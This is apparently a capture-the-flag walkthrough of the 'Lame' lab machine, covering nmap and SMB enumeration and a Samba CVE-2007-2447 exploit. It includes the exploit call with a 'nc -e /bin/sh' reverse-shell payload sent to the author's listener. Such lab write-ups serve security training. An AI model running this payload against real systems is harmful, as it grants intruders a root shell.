Ping Scan
ping 10.10.10.3
Ping worked, So machine is reachable.
Nmap default
nmap 10.10.10.3 -oN dnmap
Nmap Scrip scan
nmap 10.10.10.3 -sV -sC -oN snmap
Nmap SNMP Scan
nmap -sU -p 161 10.10.10.3
Snmp is filtered
Nmap all port Scan
nmap 10.10.10.3 -p- -T5 --open -oN anmap
can see an new open port 3632.
Scrip and service scan for the new port
nmap -sV -sC -p3632 10.10.10.3 -oN 3632nmap
FTP Enum Can login as ftp or Anonymous, but no file or directory inside Ftp Session.
ftp 10.10.10.3
Smb Enumeration
smbmap -H 10.10.10.3
Can list shares without creds.
smbclient -N //10.10.10.3/tmp
can list the content of share ”tmp”
Lets try to Get initial foothold on the machine using our findings.
First will move with the Smb Share we have found read and writable. We can se the is a file “vgauthsvclog.txt.0” is present, will get that and analyze.
get vgauthsvclog.txt.0
cat vgauthsvclog.txt.0
Nothing useful.
Search For Public exploit
On this initial enumeration on smb, we can see its version, will search is there any public exploit for smb version.
Yes, there is an exploit code: https://github.com/Ziemni/CVE-2007-2447-in-Python/blob/master/smbExploit.py
Ok No will use the exploit. I have saved the exploit code in a file named ‘exp.py’ in my kali machine and just ran the program, and I can see the usage and ran accordingly.
python3 exp.py 10.10.10.3 139 'nc -e /bin/sh 10.10.14.61 443'
Set up an Netcat listener on 443 to catch reverse shell
rlwrap nc -nlvp 443
Coooool…! We landed on root shell, so no need Privilege escalation on the machine.
Then upgraded my shell, the machine has python’s initial version, there is no python 3 or 2.
python -c 'import pty; pty.spawn("/bin/bash")'
Will search for flag in root and home directory
find / -type f -name "root.txt" 2>/dev/null
find / -type f -name "user.txt" 2>/dev/null
We found root flag in root directory
And User flag on /home/makis
Done With Lame…:)